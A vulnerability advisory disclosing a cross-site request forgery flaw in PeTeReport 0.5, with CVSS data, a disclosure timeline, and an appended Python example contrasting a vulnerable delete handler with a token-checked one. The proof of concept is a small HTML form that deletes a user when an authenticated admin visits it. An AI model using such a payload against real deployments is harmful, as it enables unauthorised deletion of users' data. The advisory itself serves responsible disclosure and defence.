PeTeReport 0.5 - Cross-site request forgery
Summary
Name | PeTeReport 0.5 - Cross-site request forgery |
Code name | |
Product | PeTeReport |
Affected versions | Version 0.5 |
Fixed Versions | Version 0.7 |
State | Public |
Release date | 2022-02-23 |
Vulnerability
Kind | Cross-site request forgery |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:X/RL:X/RC:X |
CVSSv3.1 Base Score | 4.3 |
Exploit available | No |
CVE ID(s) |
Description
PeTeReport version 0.5 contains a cross-site request forgery (CSRF) vulnerability that allows an attacker to trick users into deleting users, products, reports and findings in the application.
Proof of Concept
Steps to reproduce
- Create a malicious HTML file with the following content.

    <html>
      <body>
        <script>history.pushState('', '', '/')</script>
        <!-- Change ID -->
        <form action="https://127.0.0.1/configuration/user/delete/:id">
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

- If an authenticated admin visits the malicious URL, the user with the corresponding ID will be deleted.
System Information
- Version: PeTeReport Version 0.5.
- Operating System: Docker.
- Web Server: nginx.
Exploit
There is no exploit for the vulnerability, but it can be exploited manually.
Mitigation
An updated version of PeTeReport is available on the vendor page.
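The pattern behind this finding and one common way to close it, as an added example (not PeTeReport's code and not its actual patch): a delete handler that trusts the session cookie alone, beside one that requires POST plus a per-session anti-CSRF token. The in-memory session store, the cookie name `sessionid`, the form field `csrf_token` and all function names are assumptions made for illustration.

```python
import hmac
import secrets

# Constructed in-memory stand-ins for the application's sessions and user table.
SESSIONS = {}                       # session id -> {"user": ..., "csrf": ...}
USERS = {1: "admin", 2: "alice"}    # constructed sample data

def login(username):
    """Create a session holding a per-session anti-CSRF token (hypothetical helper)."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid

def delete_user_vulnerable(method, cookies, form, user_id, users):
    """Pattern from the advisory: a valid session cookie alone authorises the delete."""
    if cookies.get("sessionid") not in SESSIONS:
        return 403
    users.pop(user_id, None)
    return 200

def delete_user_hardened(method, cookies, form, user_id, users):
    """Same action, but only via POST carrying the session's anti-CSRF token."""
    session = SESSIONS.get(cookies.get("sessionid"))
    if session is None:
        return 403
    if method != "POST":            # state changes are never performed on GET
        return 405
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, session["csrf"].encode()):
        return 403                  # token missing or wrong: not sent from our own page
    users.pop(user_id, None)
    return 200

def demo():
    """Return (status, user 2 still exists) for each request shape."""
    sid = login("admin")
    cookies = {"sessionid": sid}    # cookie the admin's browser sends with the request
    out = {}
    users = dict(USERS)
    out["vulnerable_get"] = (delete_user_vulnerable("GET", cookies, {}, 2, users), 2 in users)
    users = dict(USERS)
    out["hardened_get"] = (delete_user_hardened("GET", cookies, {}, 2, users), 2 in users)
    out["hardened_post_no_token"] = (delete_user_hardened("POST", cookies, {}, 2, users), 2 in users)
    form = {"csrf_token": SESSIONS[sid]["csrf"]}   # only the application's own pages carry this
    out["hardened_post_token"] = (delete_user_hardened("POST", cookies, form, 2, users), 2 in users)
    return out

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```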
Credits
The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.
References
Vendor page https://github.com/1modm/petereport
Issue https://github.com/1modm/petereport/issues/34
Timeline
- 2022-02-07: Vulnerability discovered.
- 2022-02-07: Vendor contacted.
- 2022-02-09: Vendor replied acknowledging the report.
- 2022-02-09: Vulnerability patched.
- 2022-02-23: Public Disclosure.